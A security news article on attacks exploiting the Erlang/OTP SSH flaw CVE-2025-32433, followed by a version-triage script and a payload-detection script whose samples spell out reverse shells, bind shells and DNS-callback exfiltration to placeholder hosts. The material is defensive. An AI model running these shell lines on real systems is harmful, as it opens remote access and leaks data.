HTML Code of the Content

Post: Erlang/OTP SSH Vulnerability Sees Spike in Exploitation Attempts


<div> <div> <div> <div data-edit-folder-name="text" data-index="0" data-layout-id="2" id="layout-48b47d46-5592-4d7f-b448-b2f39a815289"> <p>A severe remote code execution (RCE) vulnerability in the SSH server shipped with Erlang&rsquo;s Open Telecom Platform (OTP) is being actively exploited.</p> <p>According to a new analysis by Palo Alto&rsquo;s Unit 42, CVE-2025-32433, rated 10.0 on the CVSS scale, allows unauthenticated attackers to execute commands because the server accepts SSH connection-protocol messages (such as channel and exec requests) before authentication has completed.</p> <p>Vulnerable versions are Erlang/OTP releases older than the fixed releases on each supported line: OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20.</p> <h2>Surge in Targeted Attacks</h2> <p>Between May 1 and May 9, the researchers observed a surge in exploitation attempts, with 70% of detections originating from firewalls protecting operational technology (OT) networks.</p> <p>Many targeted sectors rely on Erlang/OTP&rsquo;s native SSH for remote administration, including healthcare, agriculture, media and entertainment, and high technology.</p> <p>&ldquo;This vulnerability, if exploited, could have severe consequences on the organization, their network and operations,&rdquo; said Thomas Richards, infrastructure security practice director at Black Duck.</p> <p>&ldquo;The attacker would have full control over the system, which can result in a compromise of sensitive information and allow them to compromise additional hosts within the network.&rdquo;</p> <p>Erlang/OTP SSH services were found to be widely exposed on the internet, sometimes on ports such as TCP 2222 that are also used by industrial equipment, creating a crossover risk between IT and industrial control systems. 
The US, Brazil and France host the highest number of exposed services.</p> <h2>Exploitation Details and Mitigation</h2> <p>Attackers have been observed deploying payloads that establish reverse shells for unauthorized access.</p> <p>One method binds a shell to a TCP connection, while another redirects Bash input and output to a remote host linked to botnet command servers. Some payloads use DNS callbacks to confirm that the payload ran without returning any output, a tactic commonly employed in stealthy campaigns.</p> <p>&ldquo;The real danger with CVE-2025-32433 is that it&rsquo;s not just an IT vulnerability: it is disproportionately affecting [OT] networks, and it&rsquo;s already actively showing up in systems tied to critical infrastructure,&rdquo; said April Lenhard, principal product manager at Qualys.</p> <p>According to Lenhard, exploitation could &ldquo;alter sensor readings, trigger outages, introduce safety risks and cause physical damage.&rdquo;</p> <p>While education accounted for 72.7% of all detections, many OT-heavy sectors such as utilities, mining and aerospace saw no recorded OT triggers, possibly due to segmentation, delayed targeting or gaps in detection.</p> <p>Researchers urge organizations to patch immediately, upgrading to OTP 27.3.3, OTP 26.2.5.11 or OTP 25.3.2.20 (or a later release on the same line), including in third-party products that embed Erlang/OTP. Temporary measures include disabling the SSH server where it is not needed, or restricting access to it with firewall rules so that only management hosts can reach the service.</p> <p>&ldquo;Addressing this vulnerability should be a top priority for any security team responsible for an OT network,&rdquo; Richards concluded.</p> </div> </div> </div></div>
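The version boundaries above are easy to get wrong by hand because the fix landed on three separate release lines. The following Python script, an added example that is not part of the article and not code from the Erlang/OTP project, triages a constructed host inventory against the fixed releases named in the article (OTP-27.3.3, OTP-26.2.5.11, OTP-25.3.2.20). It assumes that any major line older than 25 never received the fix, and that later majors (28 and up) shipped after it; the hostnames and version strings are made up.

```python
"""Triage Erlang/OTP release strings against the CVE-2025-32433 fix versions.

Added example, not from the article or from the Erlang/OTP project.
Fixed releases per the article: OTP-27.3.3, OTP-26.2.5.11, OTP-25.3.2.20.
Assumption: majors older than 25 are treated as unpatched (no fix is listed
for them); majors newer than 27 are treated as released after the fix.
"""
import re

# Minimum patched release for each maintained major line (from the article).
FIXED = {
    27: (27, 3, 3),
    26: (26, 2, 5, 11),
    25: (25, 3, 2, 20),
}

# Accepts "OTP-26.2.5.10", "OTP 26.2.5.10" or a bare "26.2.5.10".
_VERSION_RE = re.compile(r"^(?:OTP[- ]?)?(\d+(?:\.\d+)*)$")


def parse_otp_version(text):
    """Turn an OTP release string into a tuple of ints; ValueError otherwise."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"not an OTP release string: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def _pad(version, length):
    """Right-pad with zeros so tuples of unequal length compare component-wise."""
    return version + (0,) * (length - len(version))


def is_vulnerable(text):
    """True if the release predates the fix for its major line.

    A version with fewer components than the fixed release (e.g. "27.3") is
    padded with zeros, so "27.3" compares as 27.3.0 and counts as vulnerable.
    """
    version = parse_otp_version(text)
    major = version[0]
    if major in FIXED:
        fixed = FIXED[major]
        width = max(len(version), len(fixed))
        return _pad(version, width) < _pad(fixed, width)
    if major > max(FIXED):
        return False  # assumption: later majors were cut after the fix
    return True  # assumption: end-of-life lines (<25) never received the fix


def triage(hosts):
    """Map host -> 'vulnerable' | 'patched' | 'unknown' for a {host: version} dict."""
    result = {}
    for host, version in hosts.items():
        try:
            result[host] = "vulnerable" if is_vulnerable(version) else "patched"
        except ValueError:
            result[host] = "unknown"  # could not parse; needs a manual look
    return result


# Constructed sample inventory: hostnames and versions are made up.
SAMPLE_INVENTORY = {
    "plc-gw-01": "OTP-26.2.5.10",
    "plc-gw-02": "26.2.5.11",
    "mq-broker-03": "OTP-27.3.2",
    "historian-04": "27.3.3",
    "legacy-05": "OTP-24.3.4",
    "edge-06": "28.0",
    "camera-07": "erlang (unknown)",
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host:14} {SAMPLE_INVENTORY[host]:18} {status}")
```

The comparison is done on integer tuples rather than on strings so that 26.2.5.10 sorts before 26.2.5.11; a naive string compare would get that pair backwards.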
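The payload classes described in the exploitation section (a shell bound to a TCP connection, Bash I/O redirected to a remote host, and DNS callbacks that confirm execution) can be picked out of captured command lines with a few heuristic patterns. The script below is an added example and is not Unit 42's detection logic, nor anything tied to the Erlang/OTP code base: it classifies constructed sample commands into those categories and extracts the remote endpoint a reverse shell would connect to, which is the address a defender would block at the firewall. The addresses, ports and domains in the samples are made up.

```python
"""Heuristic classifier for the payload types described in the article.

Added example, not Unit 42's detection logic. Patterns cover (1) shells bound
to a listening TCP port, (2) shells whose I/O is redirected to a remote host,
and (3) DNS callbacks used to confirm execution. All sample commands are
constructed; addresses, ports and domains are made up.
"""
import re

# Ordered rules: the first matching pattern decides the label. Bind-shell
# rules precede reverse-shell rules because a bind shell also contains the
# "-e /bin/sh" fragment that the reverse-shell rule looks for.
RULES = [
    ("netcat_bind_shell",
     re.compile(r"\b(?:nc|ncat|netcat)\b[^|;&]*\s-l\S*\s+(?:-p\s+)?\d+[^|;&]*-e\s+/bin/(?:ba)?sh")),
    ("netcat_reverse_shell",
     re.compile(r"\b(?:nc|ncat|netcat)\b[^|;&]*\s-e\s+/bin/(?:ba)?sh")),
    ("bash_io_redirect_reverse_shell",
     re.compile(r"\bbash\s+-i\s+>&\s*/dev/tcp/[\w.\-]+/\d+\s+0>&1")),
    ("devtcp_socket_shell",
     re.compile(r"/dev/tcp/[\w.\-]+/\d+")),
    ("dns_callback",
     re.compile(r"\b(?:nslookup|dig|host)\s+.*?[\w-]+\.[a-z]{2,}(?:\s|$)")),
]

# Endpoint extraction for payloads that dial out: /dev/tcp/HOST/PORT, or a
# netcat command whose last two arguments are HOST PORT.
_DEVTCP_RE = re.compile(r"/dev/tcp/([\w.\-]+)/(\d+)")
_NC_TAIL_RE = re.compile(r"\b(?:nc|ncat|netcat)\b.*?\s([\w.\-]+)\s+(\d+)\s*$")


def classify(command):
    """Return the label of the first matching rule, or 'unclassified'."""
    for label, pattern in RULES:
        if pattern.search(command):
            return label
    return "unclassified"


def remote_endpoint(command):
    """Return (host, port) for payloads that connect out, else None."""
    m = _DEVTCP_RE.search(command) or _NC_TAIL_RE.search(command)
    if m:
        return m.group(1), int(m.group(2))
    return None


def analyze(commands):
    """Summarize captured commands as (command, label, endpoint) tuples."""
    return [(c, classify(c), remote_endpoint(c)) for c in commands]


# Constructed sample commands (not real captures; hosts and domains are made up).
SAMPLE_COMMANDS = [
    "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1",
    "exec 5<>/dev/tcp/198.51.100.7/2222; cat <&5 | while read l; do $l 2>&5 >&5; done",
    "nc -lvp 4444 -e /bin/sh",
    "nc -e /bin/sh 203.0.113.10 9001",
    "dig +short $(id | base64 -w0).cb.example.net",
    "nslookup $(whoami).cb.example.net",
    "ls -la /opt/erlang/releases",
]

if __name__ == "__main__":
    for command, label, endpoint in analyze(SAMPLE_COMMANDS):
        print(f"{label:32} {str(endpoint):28} {command}")
```

The DNS-callback rule matches any lookup whose argument ends in a dotted name, so it will also fire on ordinary troubleshooting commands; in practice it is the combination of a lookup with a subshell such as `$(whoami)` in the queried name, and the fact that it arrives through an unauthenticated SSH session, that separates a beacon from an administrator's `dig`.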